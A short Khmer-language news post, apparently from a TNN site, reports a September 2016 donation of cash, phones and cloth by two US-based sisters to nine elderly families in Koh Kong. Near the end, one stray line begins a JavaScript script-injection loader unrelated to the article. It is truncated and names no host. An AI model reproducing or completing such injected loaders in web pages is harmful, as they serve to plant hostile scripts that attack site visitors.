ព្រឹតិ្តការណ៍ថ្មីៗ

លោក ស្រីទូ ចាន់នី និងប្អូនស្រីទូចចន្ថា នៅសហរដ្នអាមេរិចបានផ្ដល់អំណោយមនុស្សធម៌០៩ គ្រួសារនៅកោះកុង

3 ឆ្នាំ មុន 5 tnn_admin

កោះកុង៖ នៅព្រឹកថ្ងៃទី១៦ ខែកញ្ញា ឆ្នាំ២០១៦ចាស់ជរាគ្មានទីពឹង09គ្រួរសារ ទទួលបានការឧបត្ថម្ភពីលោកស្រី ទូច ចាន់នី និង

ប្អូនស្រី ទូច ចន្ថា រស់នៅសហរដ្នអាមេរិច និងដំណាងអោយសប្បរសជនជាច្រើននាក់,ក្រោមការចង្អុលបង្ហាញពីសហការរី TNN.ចុះសួរសុខទុក្ខ និងផ្ដល់ជូនក្នុងមួយគ្រួរសារទទួលបាន ថវិការ 10ដប់មឺុនរៀលនិង ទូរស័ព្វ01គ្រឿង ព្រមទាំងសារុង01និង ក្រណាត់សរ01ដុំ ។

ពួកគាត់ទាំង09គ្រួរសារមានការសប្បាយចឹត្តយ៉ាងខ្លាំងណាស់ និងសូមអរគុណដល់បុក្គលិកTNNប្រចាំខេត្តកោះកុងផងដែរហើយពួកគាត់ ក៏បានជូនពរដល់សប្បរសធម៌ទាំងអស់គ្រប់ក្រុមគ្រួរសារទទួលបានពរប្រាំប្រការគឺអាយុ វណ្ណះ សុខះ ពលះ បដិភានះ កុំបីអាក់ខានឡើយនិងទទួលបានសុភមង្គុលគ្រប់ក្រុមគ្រួរសារ។ ដោយ៖វណ្ណឌី

00bef274-a259-46b6-8118-47ba98351d5f

186b5619-55b4-4e71-906c-cf98c7a537a0 79097abc-f7be-4a26-aa4b-4993e6fb4d90

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់